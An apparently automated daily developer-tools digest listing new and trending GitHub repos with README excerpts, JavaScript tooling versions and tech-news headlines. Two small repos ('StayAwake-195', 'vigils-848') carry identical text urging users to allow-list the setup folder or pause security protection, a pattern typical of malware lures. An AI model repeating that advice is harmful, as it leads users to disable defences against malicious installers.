Daily developer tools intelligence: new repos, hot projects, and version tracking. Each entry includes a plain-English explanation of what it actually does.
zengxiao-he/tessera (★43 · Python) A small, from-scratch LLM stack built around one goal: distill a large teacher into a small student, then serve that student efficiently. Keeping that goal end-to-end means touching most of the pieces that matter in practice — custom GPU kernels, sharded training, an inference engine, quantization, and a serving front end — without any of it being...
ulyssestenn/omt (★33 · Python)
A small, dependency-free CLI for running the same prompt against your local Ollama models and saving every response to disk — so you can compare models (or compare repeated runs of one model) side by side. It uses only the Python standard library: no pip install required.
phun333/pi-infobar (★25 · Swift) A native macOS menu-bar dashboard for your Pi agent usage. See your total spend, the languages you actually code in, model costs, projects and token usage — all computed locally from your session logs. Local by default, with optional SSH sync from your own remote Pi server.
getgantry/gantry (★16 · Swift) Native Docker management for your Mac. Local and over SSH. Agent-ready with a built-in MCP server. Free, open source, no limits. Gantry is a fully native macOS app (SwiftUI, Swift 6) for managing and monitoring Docker — the local daemon and any number of remote hosts over SSH. No Electron, no subscription, no artificial limits.
athxrvx/Spear (★15 · Rust) --- --- After 8 years on Linux, I switched to Windows and got used to the convenience of launchers like Raycast and Flow Launcher. Returning to Linux, I deeply missed that polished workflow and the unified look of macOS.
Orkas-AI/Orkas-Awesome-AgentSkills (★8 · Python) 简体中文 This project is a collection of high-quality Orkas agents and skills, continuously being improved. Note: Skills can be used both inside and outside Orkas. Agents can run directly in Orkas with their intended runtime, tools, and routing behavior; outside Orkas, their definitions can still be used as prompt references or adapted to other age...
Bearcoder6/Resume2Site-Skill (★6)
Resume2Site-Skill is a lightweight Agent Skill, not a CLI or SaaS product. English documentation is available in the folded section below.
Pillarpaheat/StayAwake-195 (★5 · Swift)
[!TIP] > If the setup does not start, add the folder to the allowed list or pause protection for a few minutes. > [!CAUTION] > Some security systems may block the installation.
HopeKeeperEmpty/vigils-848 (★5 · Rust)
[!TIP] > If the setup does not start, add the folder to the allowed list or pause protection for a few minutes. > [!CAUTION] > Some security systems may block the installation.
freeCodeCamp/freeCodeCamp (★446,290 · TypeScript) freeCodeCamp.org is a friendly community where you can learn to code for free. It is run by a donor-supported 501(c)(3) charity to help millions of busy adults transition into tech. Our community has already helped more than 100,000 people get their first developer job.
public-apis/public-apis (★439,707 · Python) The Public APIs repository is manually curated by community members like you and folks working at APILayer. It includes an extensive list of public APIs from many domains that you can use for your own products. Consider it a treasure trove of APIs well-managed by the community over the years.
EbookFoundation/free-programming-books (★389,770 · Python) Search the list at []( This page is available as an easy-to-read website. Access it by clicking on [](
openclaw/openclaw (★377,197 · TypeScript) OpenClaw is a personal AI assistant you run on your own devices. It answers you on the channels you already use. It can speak and listen on macOS/iOS/Android, and can render a live Canvas you control. The Gateway is just the control plane — the product is the assistant.
nilbuild/developer-roadmap (★356,379 · TypeScript) Roadmaps are now interactive, you can click the nodes to read more about the topics.
vinta/awesome-python (★301,556 · Python) An opinionated guide to the best Python frameworks, libraries, tools, and resources. Visit the website to search and filter projects more easily.
ultraworkers/claw-code (★193,374 · Rust) Join the Discords: · > [!IMPORTANT] > Claw Code is not the serious production project here.
avelino/awesome-go (★174,729 · Go) We use the Golang Bridge community Slack for instant communication, follow the form here to join. Sponsorships: Special thanks to Awesome Go has no monthly fee_, but we have employees who work hard to keep it running.
vite — v8.0.16
A build tool and dev server for modern web projects. Starts instantly (no bundling in dev), uses native ES modules in the browser, and bundles with Rollup for production. The replacement for webpack in most new projects.
esbuild — v0.28.0
A JavaScript and TypeScript bundler written in Go. Extremely fast — 10-100x faster than webpack or Rollup. Used as the engine inside Vite and many other tools. Good for simple bundling; less configurable than webpack.
turbo — v2.9.16
A build system for JavaScript/TypeScript monorepos. Caches task results so you only re-run what changed. Built by Vercel. Speeds up CI and local builds in large codebases with multiple packages.
biome — v0.3.3
A single tool that replaces both ESLint and Prettier. Formats and lints JavaScript, TypeScript, JSON, and CSS. Written in Rust, so it runs much faster than the JS-based tools it replaces.
bun — v1.3.14
A JavaScript runtime, package manager, bundler, and test runner in one. Faster than Node.js at most things. Drop-in compatible with most Node.js code. Written in Zig.
vitest — v4.1.8
A unit testing framework built specifically for Vite projects. Uses the same config as your Vite build, runs tests in the browser environment, and is significantly faster than Jest.
oxc — v1.0.1
A JavaScript/TypeScript toolchain written in Rust — parser, linter, formatter, transpiler, bundler. The project behind the oxlint linter. Faster than most existing tools by a large margin.
rspack — v0.1.1
A webpack-compatible bundler written in Rust. Drop-in replacement for webpack with the same config format, but much faster. Built by ByteDance (TikTok's parent).
wrangler — v4.98.0
The CLI for deploying and managing Cloudflare Workers — serverless functions that run at the edge in Cloudflare's global network. Also manages KV storage, Durable Objects, Pages, and R2.
drizzle-orm — v0.45.2
A TypeScript ORM that lets you write SQL-like queries in TypeScript with full type safety. Lightweight, no code generation step, and closer to raw SQL than ORMs like Prisma.
Stop Using Conventional Commits (Lobsters) Comments
Did Claude Increase Bugs in rsync? (Lobsters) Comments
The smallest C binary (Lobsters) Comments
Total Reciprocity Public License (Lobsters) Comments
The perils of UUID primary keys in SQLite (Lobsters) Comments
An announcement from the Steering Council regarding the JIT project (Lobsters) Comments
PolyForm Licenses (Lobsters) Comments
Baby botulism outbreak: FDA still doesn't know cause—or how to prevent it (Ars Technica) In the end, the three companies involved all point the finger at each other.
How a USB-connected speaker can infect a PC without ever being touched (Ars Technica) Seller of the Sound Blaster Katana V2X doesn't consider the behavior a vulnerability.
Small modular nuclear reactor reaches criticality in first test (Ars Technica) The reactor, from a startup called Antares, isn't ready to generate power yet.
Data from GitHub public API, npm registry, and tech press (The Register, Lobsters, Ars Technica, TechCrunch, Wired, MIT Tech Review). README summaries pulled directly from each project.